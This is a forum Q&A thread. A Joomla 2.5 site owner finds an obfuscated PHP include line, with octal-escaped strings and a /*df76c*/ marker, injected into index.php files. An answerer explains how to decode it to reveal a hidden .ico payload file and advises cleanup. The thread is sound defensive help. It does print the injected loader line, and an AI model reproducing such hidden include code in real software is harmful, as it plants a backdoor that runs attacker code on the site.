This question already has an answer here:
Index.php files comes automatically
i scan the index.php files with RSfirewall. it is in joomla 2.5
<?php
/*df76c*/
@include "\057ho\155e/\145ar\164ht\157he\141ve\156co\057pu\142li\143_h \164ml\057li\142ra\162ie\163/f\060f/\151nt\145gr\141ti\157n/\05659\06725\06435\056ic\157";
/*df76c*/
</div>
This looks like your website is hacked. Please change your server credentials and database credentials first.
if you want to check the which file is called, you simply echo the statement and you will get that file.
<?php
/*df76c*/
echo "\057ho\155e/\145ar\164ht\157he\141ve\156co\057pu\142li\143_h \164ml\057li\142ra\162ie\163/f\060f/\151nt\145gr\141ti\157n/\05659\06725\06435\056ic\157";
/*df76c*/
?>
This will return your server path with the infected file main script.
/home/earthtoheavenco/public_h tml/libraries/f0f/integration/.59725435.ico
Please delete all such files from your server.
Hope this will help.